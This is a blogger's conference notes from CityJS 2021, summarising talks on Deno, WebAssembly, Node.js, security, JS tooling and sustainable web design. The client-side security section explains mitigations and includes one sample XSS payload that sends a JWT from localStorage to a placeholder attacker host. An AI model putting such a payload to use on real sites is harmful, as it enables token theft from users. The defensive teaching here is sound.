Notes from CityJS Conference 2021

CityJS Conference 2021 ran from March 24th – 26th. The conference was run as a collaborative effort by four London JavaScript communities: London JavaScript, JS Monthly, HalfStack London and London Node.js User Group.

I’ll add links to talk videos when they’re available.

Fair warning: The talk notes I’m sharing here are in a fairly raw state and provided with no warranty – I’ve tried to make sure I’ve noted down all the details accurately, but I can’t guarantee that it’s all 100% correct!

Talk: Deno and TypeScript: The Good, The Bad and The Ugly

Speaker

Kitson P. Kelly (@kitsonk)

Key takeaways

TypeScript is a first class language in Deno – you don’t need any extra tooling to use it. A lot of work has been done to improve execution speed at runtime (focused on compilation and type checking). Alongside this work, a Language Server is being developed to provide tight integration with code editors.

Talk abstract

Deno, a runtime for JavaScript, TypeScript and WebAssembly, treats TypeScript as a first class language. Doing that can be hard work. In this talk we will explore how Deno makes TypeScript a first class language.

My notes

Deno – https://deno.land/

Kitson has been involved with Deno from the early days. He has written oak, a middleware framework for Deno (like Express or koa).

Deno is a command line runtime for JavaScript, TypeScript and WebAssembly. It is written in Rust, on top of V8.

TypeScript is a first class language in Deno. Deno can type check your JavaScript too.

TypeScript is a "fully erasable type system for JavaScript"

TypeScript compiler (tsc) is embedded in Deno – provides type checking and transpiling for the language

Deno statically analyses code at runtime, automatically pulls in dependencies from URLs and writes them to a cache.
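
To illustrate, here’s a minimal sketch of that flow using oak (the oak version pinned in the import URL is an assumption):

// server.ts – on first run, Deno fetches the URL import and writes it to its cache.
// Run with: deno run --allow-net server.ts
import { Application } from "https://deno.land/x/oak@v6.5.0/mod.ts";

const app = new Application();
app.use((ctx) => {
  ctx.response.body = "Hello from Deno + TypeScript";
});
await app.listen({ port: 8000 });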

TypeScript → JavaScript → V8

"TypeScript tax" – Lots of hard work has been done to reduce the performance impact of TypeScript compilation in Deno – at one point TypeScript execution was 50x slower than using JavaScript.

In mid-2020 the Deno compiler infrastructure moved to Rust, which started to introduce some significant improvements to execution time.

Not feasible to rewrite TypeScript checking in Rust as it would splinter things away from the work being done by the TypeScript team.

Deno features:

  • All type libraries included in CLI binary
  • Supports JSX + TSX out-of-the-box (React transformation by default)
  • … (lots of them, but I didn’t have time to note them)

Deno Language Server is currently in development – uses tsc, provides access to deno lint + fmt.

https://deno.land/manual/getting_started/setup_your_environment#lsp-clients

Future of Deno (lots of work on performance):

  • Improving performance of Deno Language Server
  • Improve how TypeScript compiler is used
  • Working on parsing performance improvements

Talk: Supercharge your JavaScript with WebAssembly

Speaker

Tamas Piros (@tpiros)

Key takeaways

WebAssembly allows you to run native apps in users’ browsers. You can write code in C, C++, .NET languages, Java, Ruby, Go, PHP, Python, TypeScript or Rust. This code has access to the browser DOM and is able to write to a virtual file system. WebAssembly is well suited to low-level and CPU intensive tasks.

Talk abstract

WebAssembly is an emerging technology that allows us to expand the capabilities of the web today. Is it a competitor of JavaScript? Should you learn it today? Join this talk to find out more about the possibilities of WebAssembly.

My notes

Web Platform as of 2018 – Browser = Virtual Machine for JS code execution, Web APIs

JavaScript great for leveraging ecosystem, but has limits e.g. not good for CPU intensive work, low-level tasks.

WebAssembly was created in 2015. asm.js predates WebAssembly (2013) and allowed apps written in C to run as web apps.

Since 2019 WebAssembly is a W3C recommendation – part of the web standards specifications.

Official description: "WebAssembly is a low-level assembly-like language with a compact binary format that runs with near-native performance and provides languages such as C/C++ and…"

A simpler description: WebAssembly allows you to run native apps on the web

WebAssembly functions can be exposed to JavaScript.

WebAssembly is not here to replace JavaScript – it enhances / augments it. It’s a complementary language to JavaScript.

Web Platform today – Browser = Virtual Machine for JavaScript execution + Virtual Machine for WebAssembly execution, Web APIs

WebAssembly has a JavaScript API for (a minimal sketch follows this list):

  • Loading modules – compiled WebAssembly binary (.wasm file)
  • Creating new memory and table instances
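
A hedged sketch of loading and calling a module from JavaScript (the add.wasm file and its exported add function are hypothetical):

// Inside an ES module: fetch, compile and instantiate a .wasm binary,
// then call a function it exports.
const { instance } = await WebAssembly.instantiateStreaming(
  fetch("add.wasm"),
  {} // import object – empty, as this hypothetical module imports nothing
);
console.log(instance.exports.add(2, 3)); // → 5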

Creating a .wasm file:

  • Write code in C, C++, .NET languages, Java, Ruby, Go, PHP, Python, TypeScript or Rust
  • Use Emscripten or use direct compile targets to produce .wasm
  • Load & consume via JavaScript

Languages which can compile to WebAssembly: https://github.com/appcypher/awesome-wasm-langs

Compiling C code to WebAssembly generates a .js file and a .wasm file. You can load the JavaScript in an HTML page and call the functions exposed by the C code (compiled to WebAssembly).

You can access the browser DOM from your original source code e.g. in Go:

// Go (via the syscall/js package): look up a DOM element from WebAssembly
js.Global().Get("document").Call("getElementById", "some-element")

WebAssembly allows you to write code which does low level work – e.g. image parsing with Go – in the browser.

WebAssembly allows you to access a virtual file system. This means you can write files (temporarily).

Don’t think it was specifically mentioned in the talk, but I noticed that Cloudinary allows you to run WebAssembly on their CDN – https://cloudinary.com/documentation/custom_functions

Talk: New and experimental features in Node.js core

Speaker

Beth Griggs (@BethGriggs_)

Key takeaways

Node.js doesn’t have a formal roadmap, so it can sometimes be tricky to tell what’s coming next. A good way to find out is to keep an eye on the work of Working Groups and Teams on GitHub, as well as Strategic Initiatives (links below).

Marking features as experimental allows for user feedback and iteration on the APIs.

Talk abstract

Node.js core does not have an official roadmap – it’s the sum of the interests and efforts of the contributors that determines the future direction of the project. The evolution of a new feature in Node.js can take different twists and turns. Some new features land as experimental, to give time to gather user feedback before they’re considered stable. Other features will land as stable from the start. So, what’s in the pipeline? This talk will take a look at some of the new and experimental features in Node.js core.

My notes

Node.js is an impact project under the OpenJS Foundation, alongside jQuery, Electron and others.

Node.js doesn’t have a formal roadmap, or a corporate sponsor.

There is a heavy flow of activity, so it’s not always obvious what’s coming next with Node.js.

How can you tell what’s coming next with Node.js?

  • nodejs.medium.com
  • Twitter – contributors share what they’re working on
  • Subscribe to the node GitHub repositories – notifications can be overwhelming though

Working Groups and Teams e.g. Build Working Group, Package Maintenance Working Group, Next-10 Team

https://github.com/nodejs/TSC/blob/main/WORKING_GROUPS.md#current-working-groups

If you’re interested in getting involved with Node.js, these working groups and teams can be a good starting point. Check out their GitHub repositories and watch their meetings.

Technical Steering Committee Strategic Initiatives

Community Committee Strategic Initiatives

Next 10 Team (https://github.com/nodejs/next-10) – Reflected on the last 10 years: what went well, extracted core values and constituencies. e.g. when reviewing a PR, ask: does this align with our value of Developer Experience?

https://github.com/nodejs/node/blob/master/doc/guides/technical-values.md

Next 10 Survey – https://www.surveymonkey.com/r/86SSY9Q – your chance to indicate what’s important to you in the future of the Node.js runtime.

Distinct flow for releases – Current, Active Long Term Support (LTS), Maintenance LTS

Maintenance tends to be restricted to security and critical bug fixes. Typically there is a new release every 2 weeks for the Current release line. Sometimes features are not backported.

Release working group has a draft release schedule – https://github.com/nodejs/Release#readme

Project is very dependent on volunteers, so schedule is provisional.

Stability Index for features:

  • Stability 0 – Deprecated – Features have deprecation IDs e.g. DEP1045
  • Stability 1 – Experimental – Not recommended for use in production
  • Stability 2 – Stable – Compatibility with the npm ecosystem is a high priority.

https://nodejs.org/api/all.html#documentation_stability_index

Pending deprecations – can tell node to emit pending deprecation warnings with --pending-deprecation flag.

Runtime deprecations – warning messages emitted to stderr e.g. that unhandled promise rejections will throw by default from Node.js v15 onwards.

--no-deprecation will silence deprecation warnings (not generally advised)

Experimental features – APIs may change, even in long-term support, use with caution in production workloads

Marking features as experimental allows for user feedback and iteration on the APIs.

Some current experimental core modules:

  • Async Hooks – inc. AsyncLocalStorage (see the sketch after this list) – under discussion to move to Stable.
  • Diagnostics Channel – pub/sub API for sending diagnostics messages.
  • Inspector – API for interacting with V8 inspector e.g. CPU profiler, Heap profiler
  • Trace Events – allows you to centralise tracing events from Node core, V8 or your own code.
  • WebAssembly System Interface (WASI)
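
A minimal sketch of the AsyncLocalStorage API mentioned above (the store shape is made up for illustration):

import { AsyncLocalStorage } from 'async_hooks';

const als = new AsyncLocalStorage();

function handleRequest(id) {
  // Everything called inside run() – sync or async – sees this store.
  als.run({ requestId: id }, async () => {
    await Promise.resolve();
    console.log('handling request', als.getStore().requestId);
  });
}

handleRequest(1);
handleRequest(2);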

Some current experimental APIs:

  • ECMAScript Modules Experimental APIs – Core API is stable in v15 (soon to be marked stable in v12 and v14), but Loaders API, JSON Modules, WASM Modules are all still experimental.
  • ECMAScript Top-level await – Allows you to await code outside of an async function i.e. at the "top-level".
  • Policies – Security feature. Create manifest policy file and code will be verified against it at runtime.
  • Timers Promises API – Timer functions which return Promises (see the sketch after this list).
  • Other experimental APIs – buffer.Blob, Web Crypto API
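
A small sketch combining two of the items above – top-level await and the Timers Promises API (run as an ES module, on a Node.js version where both are available):

import { setTimeout } from 'timers/promises';

// Top-level await: no wrapping async function needed.
const result = await setTimeout(100, 'done');
console.log(result); // → 'done' after ~100ms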

Experimental flags – to use some of these features you need to pass a command line flag to node e.g. --experimental-wasm-modules

Very experimental features – You’ll need to build and compile the node binary yourself with specific flags.

Stable – Semantic Versioning applies and compatibility is a priority – though there are exceptions.

How / when do features get promoted to Stable? – Depends on the contributors actively working on it, as well as user feedback. Some features may never be made Stable and could be removed.

Other new features:

  • AbortController
  • npm v7 (bundled with Node.js 15) introduces a new command – npm diff – which allows you to compare two versions of a package
  • Source map v3 support (stable as of v15.12.0)
  • V8 9.0 – includes RegExp match indices

First release of Node.js 16 scheduled for 20th April 2021 – even numbered release, so will be promoted to Long Term Support in October 2021.

Node.js 10 reaches end-of-life at the end of April 2021 – no more bug or security fixes.

Talk: 10 secrets to improve Node.js Security

Speaker

Erick Wendel (@erickwendel_)

Key takeaways

Do not block the event loop; use an API gateway; avoid sequential identifiers and default ports; monitor npm packages; manage environment variables; be careful when using Docker; handle network policies; use static code analysis; monitor your infrastructure; and lock your computer after using it.

Talk abstract

In this talk, attendees will see real-world examples of how to avoid common mistakes. Through practices and tools, they will learn how to make changes to their existing applications so they can run them with no worries. We’ll use JavaScript for context, but these tips can be applied to any language/platform.

My notes

Who cares about app security? Lots of people share usernames and passwords, release new apps and versions regardless of the costs.

flatmap-stream npm package was compromised in 2018 and stole money from Bitcoin wallets.

Prototype pollution security vulnerability – affected lodash and jQuery

Cash Overflow attack – Denial of Service attack against serverless resources exposing you to high hosting bills

No. 10 – Do not block the event loop – use streams for processing large amounts of data e.g. CSV file → Buffer → Chunks → Processing. Regular expressions can also block the event loop if you’re not careful.
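
A minimal sketch of the streaming idea (the file name is hypothetical) – the file is processed chunk by chunk instead of being loaded into memory in one go:

import { createReadStream } from 'fs';

let rows = 0;
createReadStream('big-export.csv', { encoding: 'utf8' })
  .on('data', (chunk) => {
    // Each chunk is a small slice of the file, so the event loop stays free.
    rows += chunk.split('\n').length - 1;
  })
  .on('end', () => console.log(`Processed ~${rows} rows`));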

No. 9 – Use an API gateway – Can provide API authentication, rate limiting, throttling etc.

No. 8 – Avoid sequential identifiers and default ports – Don’t expose services on default ports (e.g. PostgreSQL). Don’t have sequential user IDs e.g. /user/1 – use UUIDs.

No. 7 – Monitor npm packages – Audit packages before you install them with https://github.com/lirantal/npq/

No. 6 – Manage environment variables – Don’t put passwords and secrets in plain text in your application. Cloud services have solutions you can use e.g. AWS Secrets Manager. Other solutions: Vault by HashiCorp, git-crypt tool.

No. 5 – Be careful when using Docker – Don’t expose the Docker daemon socket, limit capabilities to only what your container needs, set volumes to read-only. Don’t use docker-compose in production, use Kubernetes instead.

No. 4 – Handle network policies – Default deny all egress traffic in Kubernetes. In Node.js there is an experimental Policies module.

No. 3 – Static code analysis – eslint-plugin-security to help you detect unsafe JavaScript. For Node.js specifically, eslint-plugin-security-node. SonarQube can help with code quality and security.

No. 2 – Monitor your infrastructure – We should know about a problem before our customers do e.g. use tools like New Relic and AppDynamics. AWS CloudTrail is good for auditing everything that is happening in your infrastructure.

No. 1 – Lock your computer after using it – if you don’t you’re leaving yourself completely vulnerable.

Talk: The Third Age of JavaScript

Speaker

Shawn Swyx Wang (@swyx)

Key takeaways

The First Age of JavaScript was focused on building the language, The Second Age on forming the ecosystem, and the current Third Age is focusing on clearing legacy assumptions (move to ES modules, death of IE11, reducing the mess of JS tooling).

Talk abstract

The way we write JavaScript in 2030 will be completely different than in 2020. Here’s why: the slow death of IE11 and rollout of ES Modules will converge toward a new generation of JavaScript tooling. These tools are faster, more typesafe, and polyglot, leading to both a better developer and user experience. Change is afoot!

My notes

The ages:

  • The First Age – 1997 – 2007
  • The Second Age – 2009 – 2019
  • The Third Age – 2020 – 2030

The First Age of JavaScript (1997 – 2007)

Building a language

Brendan Eich joined Netscape to write Scheme in the browser, but was asked to write something Java-like for the browser instead. JavaScript was born.

Forming the language – ECMAScript 1, 2 and 3 in the first few years, then a long gap with limited progress (ECMAScript 4 was abandoned); 2008 was a pivotal year

Two tracks:

  • Dialects: ActionScript, JScript, Qt, WMLScript
  • Standard: jQuery, dojo toolkit, mootools

2008 – The Oslo Meeting – Harmony was reached! It’s why ECMAScript 6 was codenamed "Harmony".

The Second Age of JavaScript (2009 – 2019)

Forming of the ecosystem

2009 – CommonJS as a module format, Node.js as a runtime, the birth of npm

Many of the things we’re still working with today.

Runtimes:

  • 2009 – Node.js, Chrome
  • 2013 – Electron
  • 2015 – React Native
  • 2019 – Hermes (optimised for Android execution)

Build tools:

  • 2009 – Google Closure Compiler, CoffeeScript
  • 2012 – Grunt, Webpack, TypeScript
  • 2014 – Gulp, Traceur compiler
  • 2015 – 2018 – Babel, Rollup, Parcel, Bazel

Frameworks:

  • 2010 – Angular, Backbone
  • 2012 – Meteor
  • 2013 – 2014 – React, Vue
  • 2017 – Svelte

This is the story so far.

The Third Age of JavaScript (2020 – 2030)

Clearing Legacy Assumptions – Prediction: this is the dominant theme for the next 10 years.

The Shift Left in JS Tooling – TypeScript, …

Left – write code, Right – deploy code in production – more expensive to catch bugs in production, strong business case for shifting left.

Moving off of CommonJS – ES Modules, Death of IE11

Reducing the mess of JavaScript Tooling – TypeScript, Rust, Go, Collapsing Layers

Clearing the crud.

ES Modules in the Third Age of JavaScript

What’s an ES Module? At its most basic, it’s using import and export. Now supported in browsers, so you don’t need to bundle in development. In production you should probably still bundle (the V8 team’s recommendation if you have 300+ modules).
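
For illustration, import and export at their most basic (file names are hypothetical):

// math.js – export a named binding
export function double(n) {
  return n * 2;
}

// main.js – import it directly, no bundler required;
// in the browser: <script type="module" src="main.js"></script>
import { double } from './math.js';
console.log(double(21)); // → 42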

In future: official loader hooks, native module APIs…

Benchmark – Create React App vs Vite + React – Vite takes almost no time to start up; CRA has a long install / build time

Limitations:

  • Browser support – We’re tracking the death of IE 11 – Twitter, Microsoft, LinkedIn, dailymotion, Adobe, GoDaddy and Skillshare have all dropped support. US government websites are close to dropping support (usage of IE11 is currently 2.6%; their threshold for support is > 2% of users). Official end-of-life in 2029.

Microsoft Edge has an IE mode – can upgrade to Edge and use apps which need IE in IE mode

Adoption is happening for ES Modules! e.g. Sindre Sorhus is rewriting his 1,000+ modules to be only ESM.

Third Age – New Tooling

Moving away from JavaScript tooling written in JavaScript.

The Assumptions:

  • For JS by JS – "JS tools should be written in JS, so that JS developers can understand and contribute to the tools they use"
  • Unix Philosophy – "Each tool should do one thing well"

We’re starting to question these assumptions.

TypeScript took over – nearly all libraries in the React ecosystem have rewritten their core in TypeScript

ESBuild – alternative to Webpack, written in Go, about 100x faster

Rust core – Deno, Relay, Volta

Ditch the JS Core – Systems Core Scripting Shell (with a diagram I can’t represent!)

What functions belong together?

Why are all these different things?

  • Typechecking – TypeScript
  • Transpiling – Babel
  • Formatting – Prettier
  • Linting – ESLint
  • Testing – Jest
  • Bundling – Webpack, Rollup, Parcel

It becomes very slow as they’re all running separately, each with its own configuration.

Sweeping It Under A Rug – Create React App – Bundles everything together

Related article: React Distros and The Deployment Age of JavaScript Frameworks

The way forward: Collapsing layers

"Rome is designed to replace Babel, ESLint, Webpack, Prettier, Jest and others" – https://rome.tools/

Deno builds a lot of things in to the core

The third age may be JavaScript’s last – The Death of JavaScript?

Related talk by Gary Bernhardt – The Birth & Death of JavaScript

"The Universal Virtual Machine" of JS described by Brendan Eich could be replaced with WebAssembly (WASM)

This talk is a discussion piece, a theory. Open for debate.

Talk: Next-gen Frontend tooling

Speaker

Pavithra Kodmad (@PKodmad)

Key takeaways

Many front end development tools are slow and painful to configure, but things are starting to change. Vite is one of the next generation of tools which approach things differently. It takes advantage of ES modules, provides hot module reloading (HMR) for React and Vue, supports TypeScript and JSX out-of-the-box and is fast.

Talk abstract

Bundling and frontend tooling in general have gained special interest among many members of the coding community. We are seeing the beginnings of many innovations in tooling that will surely break through to the mainstream and make developers’ and users’ lives a lot better. Let’s peek at what these might be.

My notes

There is a large tooling stack for JavaScript applications.

We use a multiverse of tools which build on each other – possible due to the creation of Node.js and npm

JavaScript lacks compilation and static typing, and had no module system for a long time

Commonly used tools:

  • tsc compiler
  • Babel transforms
  • CSS & postcss
  • Testing tools e.g. Jest, Mocha, AVA
  • Bundlers – Rollup, Webpack, Parcel

These tools are state of the art right now, but JS developers have problems with them.

Problems with JS tools:

  • Hot Module Reload (HMR)
  • Source maps 🙁
  • Tragic config – different and quirky plugin systems
  • Everything is slow – startup time is very slow

What are we doing about these problems?

ECMAScript (ES) modules – came in ES6, most bundlers until now have assumed CommonJS

Non JS tooling – ESBuild (written in Go), very fast – "aeons faster than anything we could write in Node.js"

ESM is awesome for development – @web/web-server (?), Snowpack, Vite (from the creator of Vue, Evan You)

https://vitejs.dev/

Vite features:

  • Only changed files will be reloaded (HMR)
  • HMR support for Vue and React
  • TypeScript and JSX support
  • Instant server start and file load
  • Uses Rollup
  • Vite browser plugin

Prebundling – Vite pre-bundles JavaScript files from node_modules to avoid blocking the browser with loading hundreds of scripts. Separate modules aren’t always convenient.

Multiple entry points – "Multi-Page App" – configure via Rollup options (see the sketch below)
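
A hedged sketch of that configuration via Vite’s Rollup options (the admin page is a made-up second entry point):

// vite.config.js
import { defineConfig } from 'vite';
import { resolve } from 'path';

export default defineConfig({
  build: {
    rollupOptions: {
      input: {
        main: resolve(__dirname, 'index.html'),
        admin: resolve(__dirname, 'admin/index.html'), // second entry point
      },
    },
  },
});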

Library mode (not supported by Snowpack) – helps with bundling browser-oriented libraries for distribution (outputs ESM and UMD versions)

Vite dev server – Automatically handles referencing image paths or inlining them as base64 strings

Dynamic imports polyfill – Helps polyfill dynamic imports for browsers which don’t yet support them

Universal plugin support – Vite supports Rollup plugins

Mentioned the Third Age of JavaScript e.g. ES modules, non-JS tooling for JS, development of new bundler standardization

Talk: Authentication, authorisation and security for modern client-side applications

Speaker

Kati Frantz (@bahdcoder)

Key takeaways

It’s important to follow security best practices for every application we develop. The OWASP Top 10 is a great starting point for learning about the most common security risks and how to mitigate them.

My notes

New ways of building applications are being invented every day, but security is a fundamental concern.

OWASP Vulnerabilities:

  • Broken authentication – e.g. user password is hacked, user session stolen.
  • Cross-site scripting attacks – code executed on your website by a malicious third-party.
  • Components with known vulnerabilities

Broken authentication

Broken authentication scenario:

  • You work at Stripe and build bank account withdrawal functionality
  • Stripe customer walks into a cafe with their laptop, goes to order a pizza and leaves the laptop open
  • A hacker has been following the user for days – accesses the open laptop and withdraws money

Remedies for broken authentication:

  • Enforce more secure passwords
  • Reauthenticate for high value actions (Stripe does this)
  • Inactivity timeouts to automate logouts

Cross-site scripting attacks

You are vulnerable to these when you dangerously execute user-provided data.

Cross-site scripting (XSS) example: https://github.com/bahdcoder/xss-attacks-example

In the example:

  • Query string value (search keywords) rendered directly on the page
  • <img> tag with no src; onerror runs JavaScript to make a request with fetch (see the sketch after this list)
  • Could easily extract JWT from local storage and send to a malicious third-party server
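
A hedged sketch of what such an injected payload could look like (the attacker URL and storage key are made up):

// Submitted as "search keywords"; if the page renders it unescaped,
// the browser parses the tag and onerror fires immediately:
const payload =
  `<img src onerror="fetch('https://attacker.example/?t=' + localStorage.getItem('jwt'))">`;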

Don’t use dangerouslySetInnerHTML in React unless you know you can absolutely trust the data you are passing to it.

Content Security Policies can help and are important to include in your application. They tell the browser which origins to trust – JavaScript will only be loaded from those origin sources e.g. your own site domain, or third-parties which you have integrations with.
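
For example, a response header along these lines (the partner domain is hypothetical) restricts script loading to your own origin plus one trusted third party:

Content-Security-Policy: script-src 'self' https://js.trusted-partner.example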

Components with known vulnerabilities

  • Analyse and choose components and packages wisely
  • Cross-site scripting attacks – ensure that third-party components are not vulnerable to XSS
  • Use a third-party dependency monitor e.g. Snyk

Authentication

Traditional web app – Browser > User request to backend, which will return a JSON Web Token (JWT) or a cookie

Which should we use for verifying that the user is authenticated?

Option 1: HTTP only cookie

Sent via the Set-Cookie response header – HttpOnly cookies are not readable via JavaScript in the browser, but the cookie is automatically sent by the browser on future requests.
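
For example (cookie name and value are made up):

Set-Cookie: session=abc123; HttpOnly; Secure; SameSite=Strict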

Cross-domain problems e.g. front end on one domain and back end on another domain, can cause problems with setting cookies if you’re not able to control the domain.

Example: https://github.com/bahdcoder/http-only-cookies

Option 2: JSON Web Tokens (JWT)

If JSON Web Tokens are long lived they can be abused as they can’t be revoked.

A safer way to use JWT is to set a short expiry e.g. 15 minutes, but also generate a refresh token.

Refresh token should be regularly rotated and the back end should only allow them to be used once. Only save the refresh token to local storage.
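
A hedged sketch of that issuance step using the popular jsonwebtoken package (secret handling and payload are simplified assumptions):

import jwt from 'jsonwebtoken';
import { randomBytes } from 'crypto';

// Short-lived access token – limits the damage if it leaks.
const accessToken = jwt.sign({ sub: 'user-123' }, process.env.JWT_SECRET, {
  expiresIn: '15m',
});

// Opaque, single-use refresh token – stored server-side so it can be
// rotated and revoked, and saved to local storage on the client.
const refreshToken = randomBytes(32).toString('hex');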

Example: https://github.com/bahdcoder/refresh-token-rotation

Related IETF specification: OAuth 2.0 for Browser-Based Apps

Talk: A developer’s guide to low carbon websites

Speaker

Tim Benniks (@timbenniks)

Key takeaways

The environmental impact of the Internet is huge – if it was a country, it would be the world’s sixth biggest polluter. The good news is that there are lots of small steps which we can take to help reduce the carbon footprint of the websites we build.

Talk abstract

How to make more sustainable choices in the production of web technology. This talk helps developers to make changes to their code so that their website has a lower carbon footprint.

My notes

Internet is a huge consumer of electricity, producing a lot of CO2

Unagi – State of awareness of everything – how you might feel after this talk

Some stats:

  • If Internet was a country, would be the world’s 6th biggest polluter
  • The Internet consumes 466 TWh per year (the UK consumes 300 TWh per year)
  • Average website produces 1.76 grams CO2 per page view
  • 10,000 monthly page views = 211kg CO2 per year

How is this calculated? websitecarbon.com factors in:

  • Data transfer over the wire
  • Energy intensity of web data
  • Energy source used by data centre
  • Carbon intensity of electricity, website traffic

Three areas of interest:

  • UX & Design
  • Front end development best practice
  • Digital Experience (DXP) architecture choices

How is your website impacting the planet? Use websitecarbon.com to look at the impact

Design & Content

Shitty accessibility and UX are high offenders

Proper usability and SEO improve things

If a page is easy to find and easy to understand, people need their device less; fewer HTTP requests = lower footprint

Convey the message in as little content as possible

At least follow best practices – use a rough tool like Lighthouse to cover the basics

What can you do about accessibility (A11Y) as a web developer?

  • Practice inclusive design
  • Make code compliant with WCAG A + AA
  • Make everything relative – EM, REM, % – e.g. Firefox doesn’t scale everything with pixels

SEO

  • Canonical URL
  • Proper title and description
  • sitemap.xml
  • Schema.org rich data
  • Proper Open Graph tags
  • No 404 / 500 errors
  • Use HTTPS
  • Use semantic HTML
  • Correct page outline

All of these things can help people find / buy what they need quicker.

Performance of front end has a huge impact on the carbon footprint

3 years ago, a web page had an average of 4 grams CO2 emissions – nowadays this is 1.75 grams

What are the biggest offenders? Things which are hard to control:

  • Third party libraries, embeds
  • Media assets
  • JS personalization

Generally poorly optimized, might not use green hosting

Eliminate bloat

Remove as many third-party dependencies as possible, or at least lazy load them

Do you really need all of lodash, jQuery, Modernizr, Moment.js?

Make sure a library uses import / export (ES modules) so that you can benefit from tree shaking (removal of unused code), which build tools like Webpack can take care of

Old school JS personalisation libraries loaded via Google Tag Manager tend to be the worst

Marketing people bloat your website through Google Tag Manager, but they have no idea!

"Controversial" opinion: most brands only use 5% of analytics – maybe it’s not worth the bloat?

Progressive enhancement through CSS, JavaScript and content – start simple, make your app work everywhere, treat JS as a feature, not a requirement

Progressive enhancement requires less code, so it has a lower carbon footprint

Mobile first also means thinking about having no Internet connection

Managing images and video is hard – optimize assets for smallest files size, correct file type, correct resolution – do it for each context it’s used in e.g. different responsive breakpoints.

Google Stadia can deliver 4K video with minimal input lag, but we can’t show a simple image on a web page?!

You can DIY an image optimization pipeline, but it’s expensive and time consuming. Use a platform which does it for you – they’re generally not expensive.

Lazy load all the things – only load something when the user needs it. Don’t waste resources.

You can use the HTML attribute loading="lazy" on images and iframes, but you can also lazy load things like third-party libraries.

Lazy load YouTube video = show a thumbnail with a play button, and only embed the video when the user clicks on it.
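
A minimal sketch of that click-to-load pattern (the selector and VIDEO_ID are placeholders):

const placeholder = document.querySelector('.video-placeholder');

placeholder.addEventListener('click', () => {
  const iframe = document.createElement('iframe');
  iframe.src = 'https://www.youtube.com/embed/VIDEO_ID?autoplay=1';
  iframe.allow = 'autoplay';
  // The heavy YouTube embed only loads after this click.
  placeholder.replaceWith(iframe);
});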

Beware of GDPR – sometimes you can’t lazy load

Digital Experience (DXP) architecture

DXPs combine multiple tools to create a platform – provide context for the user, generally chosen by marketers e.g. content management, newsletters, digital asset management, personalization, A/B testing, CRM, analytics.

Traditionally one system which does everything – Sitecore, Adobe AEM, Drupal etc.

Issues: cost, performance, security, power consumption, scalability – these monolithic systems are always on

Jamstack to the rescue – not the right choice for all websites, but can work for many of them

Jamstack = User → CDN Edge → Netlify magic.

You can add SaaS providers e.g. for a Headless CMS.

Look at services, functions as microservices – make them stateless and stupid

All the server farms have a lot of servers and consume so much power – choose a hosting partner and CDN with a low carbon footprint. Persuade your clients to do the same.

Recap:

  • Follow general UX & SEO guidelines
  • Follow performance guidelines
  • Reduce bloat
  • Deal with media assets
  • Choose the right architecture
  • Choose a green host / CDN